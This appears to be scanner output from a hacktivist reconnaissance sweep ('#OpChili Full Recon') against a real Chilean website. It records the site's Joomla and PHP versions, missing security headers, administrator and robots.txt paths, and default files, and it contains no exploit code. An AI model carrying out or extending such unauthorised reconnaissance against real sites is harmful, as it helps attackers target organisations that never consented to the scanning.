13864[*] http://urlquery.net/search.php?q=200.54.230.247
13865[*] http://www.alexa.com/siteinfo/www.dellibertador.cl
13866[*] http://www.google.com/safebrowsing/diagnostic?site=www.dellibertador.cl
13867[*] https://censys.io/ipv4/200.54.230.247
13868[*] https://www.abuseipdb.com/check/200.54.230.247
13869[*] https://urlscan.io/search/#200.54.230.247
13870[*] https://github.com/search?q=200.54.230.247&type=Code
13871[INFO] Useful links related to AS16629 - 200.54.0.0/16:
13872[*] http://www.google.com/safebrowsing/diagnostic?site=AS:16629
13873[*] https://www.senderbase.org/lookup/?search_string=200.54.0.0/16
13874[*] http://bgp.he.net/AS16629
13875[*] https://stat.ripe.net/AS16629
13876[INFO] Date: 12/03/20 | Time: 15:50:30
13877[INFO] Total time: 2 minute(s) and 42 second(s)
13878#####################################################################################################################################
13879Processing https://www.dellibertador.cl/d3/ ...
13880
13881
13882
13883[+] FireWall Detector
13884[++] Firewall not detected
13885
13886[+] Detecting Joomla Version
13887[++] Joomla 3.9.15
13888
13889[+] Core Joomla Vulnerability
13890[++] Target Joomla core is not vulnerable
13891
13892[+] Checking apache info/status files
13893[++] Readable info/status files are not found
13894
13895[+] admin finder
13896[++] Admin page not found
13897
13898[+] Checking robots.txt existing
13899[++] robots.txt is found
13900path : https://www.dellibertador.cl/d3/robots.txt
13901
13902Interesting path found from robots.txt
13903https://www.dellibertador.cl/d3/joomla/administrator/
13904https://www.dellibertador.cl/d3/administrator/
13905https://www.dellibertador.cl/d3/bin/
13906https://www.dellibertador.cl/d3/cache/
13907https://www.dellibertador.cl/d3/cli/
13908https://www.dellibertador.cl/d3/components/
13909https://www.dellibertador.cl/d3/includes/
13910https://www.dellibertador.cl/d3/installation/
13911https://www.dellibertador.cl/d3/language/
13912https://www.dellibertador.cl/d3/layouts/
13913https://www.dellibertador.cl/d3/libraries/
13914https://www.dellibertador.cl/d3/logs/
13915https://www.dellibertador.cl/d3/modules/
13916https://www.dellibertador.cl/d3/plugins/
13917https://www.dellibertador.cl/d3/tmp/
13918
13919
13920[+] Finding common backup files name
13921[++] Backup files are not found
13922
13923[+] Finding common log files name
13924[++] error log is not found
13925
13926[+] Checking sensitive config.php.x file
13927[++] Readable config files are not found
13928
13929
13930Your Report : reports/www.dellibertador.cl/
13931#####################################################################################################################################
13932[-] Target: https://www.dellibertador.cl/d3 (200.54.230.247)
13933[I] Server: nginx
13934[I] X-Powered-By: PHP/7.3.15
13935[L] X-Frame-Options: Not Enforced
13936[I] Strict-Transport-Security: Not Enforced
13937[I] X-Content-Security-Policy: Not Enforced
13938[L] Robots.txt Found: https://www.dellibertador.cl/d3/robots.txt
13939[I] CMS Detection: Joomla
13940[I] Joomla Website Template: g5_hydrogen
13941[I] Autocomplete Off Not Found: https://www.dellibertador.cl/d3/administrator/index.php
13942[-] Joomla Default Files:
13943[-] Joomla is likely to have a large number of default files
13944[-] Would you like to list them all?
13945[y/N]: y
13946[I] https://www.dellibertador.cl/d3/LICENSE.txt
13947[I] https://www.dellibertador.cl/d3/README.txt
13948[I] https://www.dellibertador.cl/d3/bin/index.html
13949[I] https://www.dellibertador.cl/d3/cache/index.html
13950[I] https://www.dellibertador.cl/d3/cli/index.html
13951[I] https://www.dellibertador.cl/d3/components/index.html
13952[I] https://www.dellibertador.cl/d3/htaccess.txt
13953[I] https://www.dellibertador.cl/d3/images/index.html
13954[I] https://www.dellibertador.cl/d3/includes/index.html
13955[I] https://www.dellibertador.cl/d3/language/index.html
13956[I] https://www.dellibertador.cl/d3/language/overrides/index.html
13957[I] https://www.dellibertador.cl/d3/layouts/index.html
13958[I] https://www.dellibertador.cl/d3/layouts/joomla/error/index.html
13959[I] https://www.dellibertador.cl/d3/libraries/fof/LICENSE.txt
13960[I] https://www.dellibertador.cl/d3/libraries/fof/version.txt
13961[I] https://www.dellibertador.cl/d3/libraries/idna_convert/ReadMe.txt
13962[I] https://www.dellibertador.cl/d3/libraries/index.html
13963[I] https://www.dellibertador.cl/d3/media/editors/codemirror/mode/rpm/changes/index.html
13964[I] https://www.dellibertador.cl/d3/media/editors/tinymce/changelog.txt
13965[I] https://www.dellibertador.cl/d3/media/editors/tinymce/license.txt
13966[I] https://www.dellibertador.cl/d3/media/editors/tinymce/plugins/example/dialog.html
13967[I] https://www.dellibertador.cl/d3/media/editors/tinymce/templates/layout1.html
13968[I] https://www.dellibertador.cl/d3/media/editors/tinymce/templates/snippet1.html
13969[I] https://www.dellibertador.cl/d3/media/index.html
13970[I] https://www.dellibertador.cl/d3/media/jui/fonts/icomoon-license.txt
13971[I] https://www.dellibertador.cl/d3/modules/index.html
13972[I] https://www.dellibertador.cl/d3/plugins/index.html
13973[I] https://www.dellibertador.cl/d3/templates/index.html
13974[I] https://www.dellibertador.cl/d3/tests/unit/suites/libraries/joomla/crypt/cipher/stubs/encrypted/3des/1.txt
13975[I] https://www.dellibertador.cl/d3/tests/unit/suites/libraries/joomla/crypt/cipher/stubs/encrypted/3des/2.txt
13976[I] https://www.dellibertador.cl/d3/tests/unit/suites/libraries/joomla/crypt/cipher/stubs/encrypted/3des/3.txt
13977[I] https://www.dellibertador.cl/d3/tests/unit/suites/libraries/joomla/crypt/cipher/stubs/encrypted/3des/4.txt
13978[I] https://www.dellibertador.cl/d3/tests/unit/suites/libraries/joomla/crypt/cipher/stubs/encrypted/3des/5.txt
13979[I] https://www.dellibertador.cl/d3/tests/unit/suites/libraries/joomla/crypt/cipher/stubs/encrypted/blowfish/1.txt
13980[I] https://www.dellibertador.cl/d3/tests/unit/suites/libraries/joomla/crypt/cipher/stubs/encrypted/blowfish/2.txt
13981[I] https://www.dellibertador.cl/d3/tests/unit/suites/libraries/joomla/crypt/cipher/stubs/encrypted/blowfish/3.txt
13982[I] https://www.dellibertador.cl/d3/tests/unit/suites/libraries/joomla/crypt/cipher/stubs/encrypted/blowfish/4.txt
13983[I] https://www.dellibertador.cl/d3/tests/unit/suites/libraries/joomla/crypt/cipher/stubs/encrypted/blowfish/5.txt
13984[I] https://www.dellibertador.cl/d3/tests/unit/suites/libraries/joomla/crypt/cipher/stubs/encrypted/rijndael256/1.txt
13985[I] https://www.dellibertador.cl/d3/tests/unit/suites/libraries/joomla/crypt/cipher/stubs/encrypted/rijndael256/2.txt
13986[I] https://www.dellibertador.cl/d3/tests/unit/suites/libraries/joomla/crypt/cipher/stubs/encrypted/rijndael256/3.txt
13987[I] https://www.dellibertador.cl/d3/tests/unit/suites/libraries/joomla/crypt/cipher/stubs/encrypted/rijndael256/4.txt
13988[I] https://www.dellibertador.cl/d3/tests/unit/suites/libraries/joomla/crypt/cipher/stubs/encrypted/rijndael256/5.txt
13989[I] https://www.dellibertador.cl/d3/tests/unit/suites/libraries/joomla/crypt/cipher/stubs/encrypted/simple/1.txt
13990[I] https://www.dellibertador.cl/d3/tests/unit/suites/libraries/joomla/crypt/cipher/stubs/encrypted/simple/2.txt
13991[I] https://www.dellibertador.cl/d3/tests/unit/suites/libraries/joomla/crypt/cipher/stubs/encrypted/simple/3.txt
13992[I] https://www.dellibertador.cl/d3/tests/unit/suites/libraries/joomla/crypt/cipher/stubs/encrypted/simple/4.txt
13993[I] https://www.dellibertador.cl/d3/tests/unit/suites/libraries/joomla/crypt/cipher/stubs/encrypted/simple/5.txt
13994[I] https://www.dellibertador.cl/d3/tmp/index.html
13995[-] Searching Joomla Components ...
13996[I] Checking for Directory Listing Enabled ...
13997[-] Date & Time: 12/03/2020 16:21:03
13998[-] Completed in: 0:33:22
13999######################################################################################################################################
14000 Anonymous JTSEC #OpChili Full Recon #64